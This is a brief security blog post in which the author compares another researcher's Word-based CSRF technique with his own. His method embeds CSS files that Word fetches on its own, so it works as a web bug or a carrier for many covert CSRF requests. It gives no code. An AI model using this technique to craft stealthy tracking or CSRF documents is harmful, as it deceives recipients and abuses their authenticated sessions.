Okay, I didn’t write part I, and really didn’t even know about it until today. Although I invented something like it months and months ago. But the first person to talk about CSRF within Word was Michael Daw. Very interesting concept. In the context that I was using a similar technique I was using it primarily as a web-bug. Michael Daw’s technique is good, but I like mine better, because it’s probably as noisy, however, it leaves no visible queues to the victim.
Michael includes a remote image (I’ve had mixed luck trying this myself). My failures in trying nearly the exact same thing were fixed when I came up with another way to inject embedded files into word. Those files were actually CSS elements that Word will happily go and fetch for you. Click here to get the scoop on how to inject CSS files into Word. Using this same technique you can easily turn this into a complex platform for doing many CSRFs through a single Word file. See what happens when no one tells me about these things? Sheesh! Nice work Michael, I just wish I had seen it when it came out!